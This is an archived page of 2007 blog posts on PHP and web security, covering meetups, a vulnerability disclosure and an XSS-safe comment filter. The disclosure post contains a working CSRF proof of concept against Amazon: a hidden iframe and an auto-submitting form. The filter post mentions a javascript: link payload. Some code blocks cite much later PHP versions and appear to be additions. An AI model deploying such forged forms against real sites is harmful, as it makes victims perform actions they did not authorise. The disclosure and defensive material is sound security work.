About the Author

Chris Shiflett

Hi, I’m Chris: entrepreneur, community leader, husband, and father. I live and work in Boulder, CO.


All posts for Mar 2007

Digg's Eli White Speaks at PHP Meetup

The April meeting of the Columbia PHP Meetup will feature Eli White, Digg's PHP guru:

For our April PHP meetup, Eli White of Digg will be giving an insider's tour of Digg, including what they're up to and how they're using PHP. We've got a great meeting space at OmniTI and will be providing plenty of pizza and soda for everyone.

I really enjoyed our last meeting, and I'm looking forward to Eli's talk. I hope to see you there!

For those who don't live in the Baltimore / Columbia / DC area, we'll be recording Eli's talk and will post the MP3.

My Amazon Anniversary

Today I am revealing an exploitable security vulnerability in Amazon. Before I do, I want to provide some history and context.

On this day last year, I informed Amazon about a pretty serious vulnerability and demonstrated it with a few examples and a detailed description. In the description, I explained how to exploit the infamous "1-Click" feature, causing victims to purchase items of my choosing without their knowledge or consent, and I stressed that the scope of the problem extended beyond my benign examples. After some mild prodding, I finally received a reply letting me know that my email had been received, the vulnerability had been verified, and Amazon considered fixing it a top priority.

This is usually the extent of my involvement in such affairs. It's remarkably easy to find vulnerabilities in web applications, so I see no reason to make a big deal out of every discovery. Plus, it's enough trouble to inform web sites about vulnerabilities (something many of my colleagues, for good reasons, don't bother doing), so once I've done so, I feel like I've fulfilled my ethical responsibility.

Despite my prodding, the vulnerability remains a year later.

I feel like Amazon has exploited my cooperative behavior and placed me in a moral dilemma. In fact, at this point, I feel like I've already done the wrong thing by withholding this information for so long. The silence ends today.

The following example demonstrates the problem:

<iframe style="width: 0px; height: 0px; visibility: hidden" name="hidden"></iframe>
<form name="csrf" action="http://amazon.com/gp/product/handle-buy-box" method="post" target="hidden">
<input type="hidden" name="ASIN" value="059600656X" />
<input type="hidden" name="offerListingID" value="XYPvvbir%2FyHMyphE%2Fy0hKK%2BNt%2FB7%2FlRTFpIRPQG28BSrQ98hAsPyhlIn75S3jksXb3bdE%2FfgEoOZN0Wyy5qYrwEFzXBuOgqf" />
</form>
<script>document.csrf.submit();</script>

This exploit is pretty benign, because it only adds an item to your shopping cart. Always be sure to inspect your cart carefully each time you check out!

Yes, this is CSRF, and I plan to update my article in the next few days to include Amazon and Digg as examples, and I'll elaborate a bit more on the various techniques in use today.

Amazon has started requiring re-authentication in several places, so many actions are protected against CSRF. For example, the "1-Click" feature has been improved to protect against this, because adding a new address now requires re-authenticating. This is a good thing.
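
Re-authentication is one safeguard. Another widely used one, which this post does not claim Amazon uses, is to embed an unpredictable per-session token in every form and reject any request that arrives without it. Here is a minimal sketch, assuming PHP 7 or later; the function names and the csrf_token field are hypothetical, and plain arrays stand in for $_SESSION and $_POST:

```php
<?php

/* Hypothetical helper: create a token and remember it in the session. */
function csrf_issue_token(array &$session): string
{
    $session['csrf_token'] = bin2hex(random_bytes(32));

    return $session['csrf_token'];
}

/* Hypothetical helper: accept a request only if it echoes the token. */
function csrf_is_valid(array $session, array $post): bool
{
    if (!isset($session['csrf_token'], $post['csrf_token'])
        || !is_string($post['csrf_token'])) {
        return false;
    }

    /* hash_equals() compares in constant time. */
    return hash_equals($session['csrf_token'], $post['csrf_token']);
}
```

A forged form like the one above has no way to learn the token, so its request would fail the check.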

This entire affair has me rethinking my stance on full disclosure, something I alluded to in a recent interview. The Wikipedia article on full disclosure has this to say about responsible disclosure:

One challenge with "responsible disclosure" is that some vendors do not respond, or inordinately delay their response, to vulnerability reports that are not public. As long as a vulnerability is not widely known to the public (with enough detail to reproduce the attack), vendors may refuse to fix the vulnerability or refuse to give it enough priority to actually repair it. Unfortunately, vulnerabilities reported to a vendor may already be exploited, or may soon be detected by someone with intent to exploit them.

This is my primary concern. There's nothing particularly sophisticated about this attack, so I feel confident that someone else has discovered it by now, and as a user of Amazon myself, I'm not comfortable with that.

The RFPolicy offers a reasonable middle-ground; perhaps that's the best approach.

Allowing HTML and Preventing XSS

One of the most common problems faced by web developers is allowing some HTML without creating XSS vulnerabilities in the process. This problem comes up more and more often due to the rise of social networking and other Web 2.0 properties that embolden users.

Sorry, I couldn't resist using the word embolden. :-)

There have been numerous solutions to this problem, some of which are pretty good. In a previous post where I casually mentioned this topic, a few people made some recommendations, including:

Of course, BBCode inevitably comes up during these types of discussions, but I really hate the idea of using yet another markup language just because I'm too lazy to deal with HTML, especially if the markup language doesn't even try to be user-friendly. Edward Yang, the author of HTML Purifier, seems to agree:

BBCode came to life when developers were too lazy to parse HTML correctly and decided to invent their own markup language. As with all products of laziness, the result is completely inconsistent, unstandardized, and widely adopted.

Why isn't there a good, standard solution to this problem? I think it's because everyone (including me) has slightly different requirements. Creating a solution that caters to everyone's needs is likely to yield an overly-complex and error-prone approach, so it's not necessarily bad that multiple solutions exist.

For my new blog, I want to let readers mark up their comments to help them communicate more effectively. One of the most essential features is the ability to format code, because unformatted code can be difficult to follow. It's also important that no content is removed. I detest commenting on blogs where my comment is passed through something like strip_tags(), effectively mangling what I'm trying to say. It reminds me of using an IM client that tries to identify smilies and replace them with images, often making responses difficult to decipher.

I have reviewed several existing solutions, experimented with solutions that use DOM and Tidy, and eventually resorted to a dirt-simple approach that I'd like to share with you now.

I don't recommend using this approach until it has been reviewed and vetted by others. (Use at your own risk.)

The fundamental concept is to make the content safe by default, then carefully translate specific patterns back to valid (standards-compliant) markup. The basic framework, which allows no markup, is as follows:

<?php
 
/* Normalize Newlines */
$html = str_replace("\r", "\n", $html);
$html = preg_replace("!\n\n+!", "\n", $html);
 
/* Escaped (Safe) by Default */
$html = htmlentities($html, ENT_QUOTES, 'UTF-8');
 
/* Make Paragraphs */
$lines = explode("\n", $html);
foreach ($lines as $key => $line) {
    $lines[$key] = "<p>{$line}</p>";
}
$html = implode("\n", $lines);
 
?>

This lets people type plain comments without the need for any markup, and they can still discuss anything they want without losing part of their comment. Of course, this is the easy part, because no HTML is allowed.
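
To see the effect, the steps can be wrapped in a function and given a comment that contains markup. The function name escape_comment() and the sample comment are invented for illustration; the body is the framework above, unchanged, written with PHP 7 type declarations:

```php
<?php

/* Hypothetical wrapper around the framework above. */
function escape_comment(string $html): string
{
    /* Normalize Newlines */
    $html = str_replace("\r", "\n", $html);
    $html = preg_replace("!\n\n+!", "\n", $html);

    /* Escaped (Safe) by Default */
    $html = htmlentities($html, ENT_QUOTES, 'UTF-8');

    /* Make Paragraphs */
    $lines = explode("\n", $html);
    foreach ($lines as $key => $line) {
        $lines[$key] = "<p>{$line}</p>";
    }

    return implode("\n", $lines);
}

echo escape_comment("I like <b>bold</b> text.\r\n\r\nSo do I."), "\n";
/* Prints:
   <p>I like &lt;b&gt;bold&lt;/b&gt; text.</p>
   <p>So do I.</p>
*/
```

Nothing the commenter typed is removed; the tags are simply displayed as text.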

Allowing simple tags like <em> can be accomplished like this:

<?php
 
/* Emphasized Text */
$html = preg_replace('!&lt;em&gt;(.*?)&lt;/em&gt;!m',
                     '<em>$1</em>',
                     $html);
 
?>

Keep in mind that this replacement takes place after $html has been escaped, so whatever is matched by .*? (and represented by $1) is already escaped. I use non-greedy matching for this particular pattern, so .*? matches as little as possible to satisfy the pattern. You might prefer greedy matching, and ultimately, it only makes a difference in edge cases, such as when users want to use <em> tags as well as talk about them. Allowing users to preview comments before posting gives them the opportunity to correct any problems that arise from such cases.
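
The difference is easier to see side by side. This sketch runs a non-greedy and a greedy version of the pattern over an already-escaped comment containing two emphasized words; the sample text is made up:

```php
<?php

/* An already-escaped comment with two <em> elements. */
$html = '&lt;em&gt;one&lt;/em&gt; and &lt;em&gt;two&lt;/em&gt;';

/* Non-greedy (.*?): each pair of tags is translated separately. */
$lazy = preg_replace('!&lt;em&gt;(.*?)&lt;/em&gt;!m', '<em>$1</em>', $html);

/* Greedy (.*): one match spans from the first opening tag to the last
   closing tag, so the inner tags stay escaped. */
$greedy = preg_replace('!&lt;em&gt;(.*)&lt;/em&gt;!m', '<em>$1</em>', $html);

echo $lazy, "\n";   /* <em>one</em> and <em>two</em> */
echo $greedy, "\n"; /* <em>one&lt;/em&gt; and &lt;em&gt;two</em> */
```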

Allowing <blockquote> is also pretty straightforward:

<?php
 
/* Blockquotes */
$html = preg_replace('!^&lt;blockquote&gt;(?:&lt;p&gt;)?(.*?)(?:&lt;\/p&gt;)?&lt;\/blockquote&gt;$!m',
                     '<blockquote><p>$1</p></blockquote>',
                     $html);
 
?>

As you can see, I want to accommodate users who forget to use <p> tags, but I want to make sure the output is valid regardless.
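
As a quick check, this sketch applies the pattern to two escaped lines, one written without <p> tags and one with them. It assumes the replacement runs on escaped text before paragraphs are added, and the sample lines are invented:

```php
<?php

$pattern = '!^&lt;blockquote&gt;(?:&lt;p&gt;)?(.*?)(?:&lt;\/p&gt;)?&lt;\/blockquote&gt;$!m';
$replacement = '<blockquote><p>$1</p></blockquote>';

/* Two escaped lines: the first omits <p>, the second includes it. */
$html = "&lt;blockquote&gt;Quoted text.&lt;/blockquote&gt;\n"
      . "&lt;blockquote&gt;&lt;p&gt;Quoted text.&lt;/p&gt;&lt;/blockquote&gt;";

$result = preg_replace($pattern, $replacement, $html);

echo $result, "\n";
/* Both lines become:
   <blockquote><p>Quoted text.</p></blockquote>
*/
```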

Links are a bit trickier. Consider the following:

<?php
 
/* Links */
$html = preg_replace('!&lt;a +href=&quot;(.*?)&quot;(?: +title=&quot;(.*?)&quot;)? *&gt;(.*?)&lt;/a&gt;!m',
                     '<a href="$1" title="$2">$3</a>',
                     $html);
 
?>

The content represented by $1 is already escaped, but it has a special meaning in this context. Users who click the link text ($3) will initiate a request to the URL identified by $1. Imagine a link to javascript:alert('XSS'). Although this isn't actually XSS, the result is still undesirable, because users might be tricked into clicking a link that executes malicious JavaScript. For this reason, you might consider restricting the pattern further:

<?php
 
/* Links */
$html = preg_replace('!&lt;a +href=&quot;((?:ht|f)tps?://.*?)&quot;(?: +title=&quot;(.*?)&quot;)? *&gt;(.*?)&lt;/a&gt;!m',
                     '<a href="$1" title="$2">$3</a>',
                     $html);
 
?>
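
To illustrate, this sketch escapes two made-up links and runs the restricted pattern over each. Only the link with an http URL is translated back to markup; the javascript: link stays escaped and is displayed as text:

```php
<?php

$pattern = '!&lt;a +href=&quot;((?:ht|f)tps?://.*?)&quot;(?: +title=&quot;(.*?)&quot;)? *&gt;(.*?)&lt;/a&gt;!m';
$replacement = '<a href="$1" title="$2">$3</a>';

/* Hypothetical comments, escaped the same way as in the framework. */
$good = htmlentities('<a href="http://example.org/">a site</a>', ENT_QUOTES, 'UTF-8');
$bad  = htmlentities('<a href="javascript:alert(\'XSS\')">click me</a>', ENT_QUOTES, 'UTF-8');

$goodResult = preg_replace($pattern, $replacement, $good);
$badResult  = preg_replace($pattern, $replacement, $bad);

echo $goodResult, "\n";
/* <a href="http://example.org/" title="">a site</a> */

echo $badResult, "\n";
/* &lt;a href=&quot;javascript:alert(&#039;XSS&#039;)&quot;&gt;click me&lt;/a&gt; */
```

Note that a link without a title ends up with an empty title attribute, because $2 is replaced with an empty string when the optional group does not match.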

I'm also allowing inline <code> tags as well as blocks of code. For the latter, I'm using the e modifier and my code highlighting technique.
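
A caveat for anyone trying this on a current PHP release: the e modifier was deprecated in PHP 5.5 and removed in PHP 7, and preg_replace_callback() is the usual substitute. The sketch below shows only the shape of that substitution. It is not the highlighting technique mentioned above; highlight_snippet() is a hypothetical stand-in that re-escapes the code and wraps it in <pre> and <code> tags, and the sample comment is invented:

```php
<?php

/* Hypothetical stand-in for a real highlighter. */
function highlight_snippet(string $code): string
{
    return '<pre><code>' . htmlentities($code, ENT_QUOTES, 'UTF-8') . '</code></pre>';
}

/* Escaped comment containing a block of code. */
$html = htmlentities('<code>echo 1 < 2;</code>', ENT_QUOTES, 'UTF-8');

/* The s modifier lets . match newlines, so a block can span lines. */
$html = preg_replace_callback(
    '!&lt;code&gt;(.*?)&lt;/code&gt;!s',
    function (array $matches): string {
        /* Recover the original source before handing it to the highlighter. */
        $code = html_entity_decode($matches[1], ENT_QUOTES, 'UTF-8');

        return highlight_snippet($code);
    },
    $html
);

echo $html, "\n";
/* <pre><code>echo 1 &lt; 2;</code></pre> */
```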

You can try all of this for yourself by commenting on this post, and I'll be releasing the code once it has matured a bit more.

Please let me know if you discover any problems.

A New Beginning

I began my blog with a post entitled A New Beginning. For the first time since that post, the title seems appropriate again.

A few months ago, I decided to put more effort into my blog, starting (but not ending) with a new design. I'm very picky about design and information architecture, so I knew I had to find someone to work with who felt comfortable with my level of perfectionism. Luckily, I discovered the award-winning Grow Collective and lead designer Jon Tan. I think Jon's design speaks for itself, and you can learn more about our work together on the new about page.

This is more than a redesigned blog. Everything has been rethought, redeveloped, and redesigned from the ground up to be a useful resource for PHP and web application security enthusiasts as well as a supportive community for all web developers.

There's still a lot of work to be done and likely many bugs to be fixed. I'll have more to say in the next few days, and until then, please let me know if you discover any problems.

Paying for Answers

I've been subscribed to the general PHP mailing list for many years. I used to be very active, answering hundreds of questions a month, but lately my participation has dropped. While scanning through my backlog of email earlier, one subject caught my eye:

$35 to the first person who can do this XML-parsing PHP script

I was curious enough to open the email and read further:

I'll send $35 to someone via Paypal who can create a PHP script that will do the following:

  1. Read XML data from a URL (librarytools.com/events/sampledata.txt)
  2. Loop through all XML results and print to the screen the eventname and eventnextoccurrencedate (just the date) values.

To my surprise, no one had responded, so I decided to quickly provide a solution. I wasn't expecting to be paid, but I couldn't resist calling someone's bluff, especially since I knew SimpleXML would make this a 5-minute problem, regardless of what the XML document looked like. A few minutes later, I responded:

<table>
    <tr><th>Name</th><th>Date</th></tr>
<?php
 
$xml = simplexml_load_file('http://librarytools.com/events/sampledata.txt');
 
foreach ($xml->source->result as $f) {
    $name = '?';
    $date = '?';
 
    foreach ($f as $value) {
        if ($value['n'] == 'eventname') {
            $name = $value;
        } elseif ($value['n'] == 'eventnextoccurrencedate') {
            $date = date('D, d M Y H:i:s', strtotime($value));
        }
    }
 
    echo "    <tr><td>{$name}</td><td>{$date}</td></tr>\n";
}
 
?>
</table>
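
For anyone who wants to run something similar without the original feed, here is a self-contained sketch. The XML is invented: the script implies source and result elements whose children carry an n attribute, but the root element name, the child element name (field), and the values are assumptions. The sketch also escapes the name before printing it and, as the request asked, prints just the date:

```php
<?php

/* Invented sample data; only source, result, and the n attribute are
   implied by the script above. */
$sample = <<<XML
<response>
  <source>
    <result>
      <field n="eventname">Story Time</field>
      <field n="eventnextoccurrencedate">2007-04-02 10:00:00</field>
    </result>
  </source>
</response>
XML;

/* Hypothetical helper: returns one name/date pair per result element. */
function list_events(SimpleXMLElement $xml): array
{
    $events = [];
    foreach ($xml->source->result as $result) {
        $event = ['name' => '?', 'date' => '?'];
        foreach ($result as $value) {
            $n = (string) $value['n'];
            if ($n === 'eventname') {
                $event['name'] = (string) $value;
            } elseif ($n === 'eventnextoccurrencedate') {
                $event['date'] = date('Y-m-d', strtotime((string) $value));
            }
        }
        $events[] = $event;
    }

    return $events;
}

foreach (list_events(simplexml_load_string($sample)) as $event) {
    $name = htmlspecialchars($event['name'], ENT_QUOTES, 'UTF-8');
    echo "<tr><td>{$name}</td><td>{$event['date']}</td></tr>\n";
}
/* <tr><td>Story Time</td><td>2007-04-02</td></tr> */
```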

I don't bring this up to extol the virtues of SimpleXML. I'm more interested in exploring the idea of paying for answers.

Paying for answers isn't a new idea (even Google has experimented with it), but I can't think of a success story. Can you?

OWASP Spring of Code 2007

During the lightning talks at tonight's PHP Meetup, Andrew van der Stock (executive director of OWASP) announced the Spring of Code 2007, an effort that will distribute $100,000 to worthy projects, divided approximately as follows:

  • $20,000 for one lucky project.
  • $10,000 for 10 open source projects.
  • $40,000 for 8 large projects.
  • $22,500 for 9 medium projects.
  • $7,500 for an internship.

The emphasis is on open source projects that are related to web application security, and Andrew expressed a specific interest in improving PHP. As he has noted in the past, it's more difficult than it should be to develop secure applications in PHP. As the leading platform for web application development, PHP could advance the state of the art, but as Andrew stated tonight, it has some catching up to do in a few areas like SQL injection, although PDO is a big step in the right direction.

Other talks included Wez Furlong on OpenID, Alex Mikitik on PHP testing (using test-more.php and a PHP port of prove that he wrote), and John Schulz on jQuery. (I talked about CSRF.) All in all, it was a successful inaugural meeting.

If you're interested in joining us for future meetings, please join the mailing list and our PHP Meetup. Our next meeting will be 02 Apr. I hope to see you there!